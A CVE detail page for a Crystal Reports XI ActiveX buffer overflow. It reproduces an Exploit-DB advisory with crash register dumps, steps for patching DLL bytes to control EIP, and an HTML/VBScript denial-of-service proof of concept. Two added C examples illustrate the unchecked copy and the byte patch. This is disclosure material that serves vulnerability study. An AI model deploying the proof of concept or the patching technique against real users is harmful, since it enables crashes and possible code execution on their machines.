CVE-2008-0379 : Detail


Category: Overflow
14%V4
Attack vector: Network
Published: 2008-01-22 18h00 +00:00
Last modified: 2017-09-28 10h57 +00:00

CVE Description

Race condition in the Enterprise Tree ActiveX control (EnterpriseControls.dll 11.5.0.313) in Crystal Reports XI Release 2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the SelectedSession method, which triggers a buffer overflow.

CVE Information

Related Weaknesses

CWE-ID    Weakness Name
CWE-120   Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
          The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.
CWE-362   Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
          The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.
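The CWE-120 entry above, as an added C illustration that is not the control's own code (EnterpriseControls.dll is closed source and nothing of it appears on this page): a property setter in the shape of SelectedSession that copies its argument into a fixed-size field without a bound, beside the bounded version that refuses oversized input. The struct layout, the 32-byte limit, the function names and the function pointer placed after the buffer are assumptions made for the example; the race-condition half (CWE-362) is not modelled here.

```c
/* Added illustration of CWE-120 for this CVE page. NOT the
 * EnterpriseControls.dll code: the struct layout, SESSION_MAX and the
 * function names are assumptions made for the example. */
#include <stdio.h>
#include <string.h>

#define SESSION_MAX 32          /* assumed fixed-size field in the control */

struct control_state {
    char selected_session[SESSION_MAX];
    void (*on_change)(void);    /* a function pointer laid out right after it */
};

/* Vulnerable shape (CWE-120): strcpy copies until the caller's terminator, so
 * an argument of SESSION_MAX bytes or more runs past selected_session into
 * on_change. Whatever later calls on_change jumps to attacker-chosen bytes,
 * which is how a plain buffer overflow turns into control of EIP. */
int set_selected_session_unchecked(struct control_state *st, const char *in)
{
    strcpy(st->selected_session, in);
    return 0;
}

/* Hardened shape: look for the terminator within the buffer size first,
 * refuse input that does not fit, and copy an explicit length so the field
 * is always NUL-terminated and on_change is never touched. */
int set_selected_session_checked(struct control_state *st, const char *in)
{
    const char *end = memchr(in, '\0', SESSION_MAX);
    if (end == NULL)            /* no terminator within SESSION_MAX: too long */
        return -1;
    size_t n = (size_t)(end - in);
    memcpy(st->selected_session, in, n + 1);   /* n bytes plus the terminator */
    return 0;
}

static void on_change_stub(void) { puts("on_change called"); }

int main(void)
{
    struct control_state st = { "", on_change_stub };
    char oversized[64];
    memset(oversized, 'B', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';

    if (set_selected_session_checked(&st, oversized) != 0)
        printf("rejected %zu-byte argument, on_change intact\n", strlen(oversized));
    if (set_selected_session_checked(&st, "session-1") == 0)
        printf("stored \"%s\"\n", st.selected_session);
    st.on_change();
    /* Deliberately not called: set_selected_session_unchecked(&st, oversized)
     * would overwrite on_change with 0x42 bytes and corrupt the stack frame,
     * which is undefined behaviour rather than a runnable demonstration. */
    return 0;
}
```

The checked setter rejects a 63-byte argument and accepts anything up to 31 characters plus terminator; the unchecked one is kept only to show the shape the CWE describes.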

Metrics

Metrics   Score   Severity   CVSS Vector                    Source
V2        9.3     HIGH       AV:N/AC:M/Au:N/C:C/I:C/A:C     nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of other CVEs; the percentile is therefore how the EPSS score of one CVE is compared with that of the others.

Exploit information

Exploit Database EDB-ID : 4931

Publication date : 2008-01-16 23h00 +00:00
Author : shinnai
EDB Verified : Yes

#####################################################################################
Application:  Crystal Reports XI Release 2 (Enterprise Tree Control) Remote BoF/Dos
              www.businessobjects.com
Versions:     11
Platforms:    Windows XP Professional
Bug:          buffer-overflow
Exploitation: remote
Date:         2007-01-16
Author:       shinnai
e-mail:       shinnai[at]autistici[dot]org
web:          http://shinnai.altervista.org
#####################################################################################

1) Introduction
2) Technical details and bug
3) The Code
4) Fix

#####################################################################################

===============
1) Introduction
===============

This component is used to visualize on the web reports created with Crystal Reports.

#####################################################################################

============================
2) Technical details and bug
============================

Name:  EnterpriseControls.dll
Ver.:  11.5.0.313
CLSID: {3D58C9F3-7CA5-4C44-9D62-C5B63E059050}
MD5:   179e2dc7f9f6e9d6e0210e89c623fd72

Marked as:
RegKey Safe for Script:   True
RegKey Safe for Init:     True
Implements IObjectSafety: True
IDisp Safe:               Safe for untrusted: caller,data
IPStorage Safe:           Safe for untrusted: caller,data

The problem is a buffer overflow which occurs when you use the "SelectedSession()" method. It seems that, during the initialization of the component, a race condition occurs between threads and 4 bytes of the same component will overwrite EIP. If you patch these 4 bytes, you can control this register, using it to jump to a shellcode and execute arbitrary code on the user's PC.

For exploiting this vulnerability you only need to create a web page containing the CLSID and the codebase path to your crafted ActiveX.

These are the registers using the original file:

14:59:34.126 pid=1468 tid=1250 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928])
----------------------------------------------------------------
EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9
EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01
EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03
ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  --> N/A
----------------------------------------------------------------

14:59:34.142 pid=1468 tid=1250 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928])
----------------------------------------------------------------
EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9
EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01
EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03
ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  --> N/A
----------------------------------------------------------------

We'll find these 4 bytes at this address:

0x000172D8  "28 E9 7D FF"...

Using a hex editor to modify them to:

0x000172D8  "42 42 42 42"...

we'll have:

C:\Tools>bindiff /c /d EnterpriseControls_patched.dll EnterpriseControls_ori.dll
Different, Left is newer  4 bytes differ
================================================================================
000172D0  87 FF FF FF 83 6C 24 04  .....l$.     87 FF FF FF 83 6C 24 04  .....l$.
000172D8 <42 42 42 42>FF FF 83 6C  BBBB...l    <28 E9 7D FF>FF FF 83 6C  (.}....l
000172E0  24 04 2C E9              $.,.         24 04 2C E9              $.,.
================================================================================
File Count Summary
  Identical:       0 files
  Near Identical:  0 files
  Different:       1 files
  Left Only:       0 files
  Right Only:      0 files
  Errors:          0 files
  Total:           1 files
Byte Count Summary
  Matched:         4 bytes differ
  Left Only:       0 bytes
  Right Only:      0 bytes
  Total:           4 bytes

and the register values will be:

15:05:38.947 pid=12D4 tid=1240 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [42424242])
----------------------------------------------------------------
EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9
EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01
EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02
ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  --> N/A
----------------------------------------------------------------

15:05:38.978 pid=12D4 tid=1240 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [42424242])
----------------------------------------------------------------
EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9
EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A
ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A
ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01
EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02
ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B
EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A
EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  --> N/A
----------------------------------------------------------------

Isn't it fun? Naturally, the EIP overwrite requires that someone uses the crafted dll; otherwise you can just enjoy a crash of the application.

#####################################################################################

===========
3) The Code
===========

I will release a public exploit but, this time, no code execution ;-)
Everything I could say is that you can directly inject your shellcode into the dll or pass an argument to the "SelectedSession()" method and then jump to the shellcode.

Poc:

Click here for DoS exploit

    <html>
    <!-- instantiate the Enterprise Tree control by its CLSID -->
    <object classid='clsid:3D58C9F3-7CA5-4C44-9D62-C5B63E059050' id='test'></object>
    <script language='vbscript'>
    ' setting the property is enough to reach the faulting code path
    test.SelectedSession = ""
    </script>
    </html>

#####################################################################################

======
4) Fix
======

No fix

#####################################################################################

# milw0rm.com [2008-01-17]
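The step in the advisory where the crash EIP is traced back to four bytes in the file, as an added C example that is not part of shinnai's advisory or of the Business Objects product. It works on a constructed 20-byte excerpt taken from the 000172D0 row of the bindiff listing above, shows why EIP=FF7DE928 corresponds to the file bytes 28 E9 7D FF (x86 is little-endian), locates them, applies the 42424242 patch and counts the differing bytes the way bindiff reported them. The excerpt, its file offset and the function names are assumptions made for the example; a real run would load the whole DLL from disk.

```c
/* Added example for this CVE page (not shinnai's code, not Business Objects'):
 * map the register value behind the crash onto file bytes and verify a patch.
 * ORIGINAL_EXCERPT is constructed from the 000172D0 row of the advisory's
 * bindiff output; EXCERPT_FILE_OFFSET is the offset of that row. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EXCERPT_FILE_OFFSET 0x000172D0UL   /* assumed: offset of the first byte */
static const uint8_t ORIGINAL_EXCERPT[] = {
    0x87, 0xFF, 0xFF, 0xFF, 0x83, 0x6C, 0x24, 0x04,
    0x28, 0xE9, 0x7D, 0xFF, 0xFF, 0xFF, 0x83, 0x6C,
    0x24, 0x04, 0x2C, 0xE9
};

/* x86 stores the lowest byte first, so the value 0xFF7DE928 that landed in
 * EIP appears in the file as 28 E9 7D FF. */
void u32_to_le(uint32_t v, uint8_t out[4])
{
    out[0] = (uint8_t)(v & 0xFF);
    out[1] = (uint8_t)((v >> 8) & 0xFF);
    out[2] = (uint8_t)((v >> 16) & 0xFF);
    out[3] = (uint8_t)((v >> 24) & 0xFF);
}

/* Offset of the first little-endian occurrence of `value` in img[0..len),
 * or -1 if absent. A full DLL may contain the same 4 bytes more than once;
 * confirm each hit against the disassembly before patching. */
long find_u32_le(const uint8_t *img, size_t len, uint32_t value)
{
    uint8_t pat[4];
    u32_to_le(value, pat);
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(img + i, pat, 4) == 0)
            return (long)i;
    return -1;
}

/* Overwrite the 4 bytes at `off` with `value` (little-endian).
 * Returns 0 on success, -1 if the write would run past the image. */
int patch_u32_le(uint8_t *img, size_t len, size_t off, uint32_t value)
{
    if (off > len || len - off < 4)
        return -1;
    u32_to_le(value, img + off);
    return 0;
}

/* Bytes that differ between two equally sized images; bindiff reported
 * "4 bytes differ" for the patched DLL. */
size_t count_diff_bytes(const uint8_t *a, const uint8_t *b, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        n += (a[i] != b[i]);
    return n;
}

/* Absolute file offset of the bytes behind EIP=FF7DE928 (expected 0x000172D8),
 * or -1 if the pattern is not in the excerpt. */
long locate_eip_bytes(void)
{
    long rel = find_u32_le(ORIGINAL_EXCERPT, sizeof ORIGINAL_EXCERPT, 0xFF7DE928u);
    return rel < 0 ? -1 : (long)(EXCERPT_FILE_OFFSET + (unsigned long)rel);
}

/* Apply the 42424242 patch to a copy of the excerpt and return how many
 * bytes then differ from the original (expected 4). */
size_t patched_diff_count(void)
{
    uint8_t patched[sizeof ORIGINAL_EXCERPT];
    memcpy(patched, ORIGINAL_EXCERPT, sizeof patched);
    long rel = find_u32_le(patched, sizeof patched, 0xFF7DE928u);
    if (rel < 0 || patch_u32_le(patched, sizeof patched, (size_t)rel, 0x42424242u) != 0)
        return 0;
    return count_diff_bytes(ORIGINAL_EXCERPT, patched, sizeof patched);
}

int main(void)
{
    printf("EIP bytes at file offset 0x%08lX\n", (unsigned long)locate_eip_bytes());
    printf("%zu bytes differ after patch\n", patched_diff_count());
    return 0;
}
```

Running it reports the same offset the advisory names by hand (0x000172D8) and the same 4-byte difference bindiff printed. The search returns only the first hit on purpose; on the complete DLL the caveat in the comment applies.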

Products Mentioned

Configuration 0

Businessobjects >> Crystal_reports_xi >> Version r2

References

https://www.exploit-db.com/exploits/4931 (exploit, x_refsource_EXPLOIT-DB)
http://www.securityfocus.com/bid/27333 (vdb-entry, x_refsource_BID)
http://www.securitytracker.com/id?1019239 (vdb-entry, x_refsource_SECTRACK)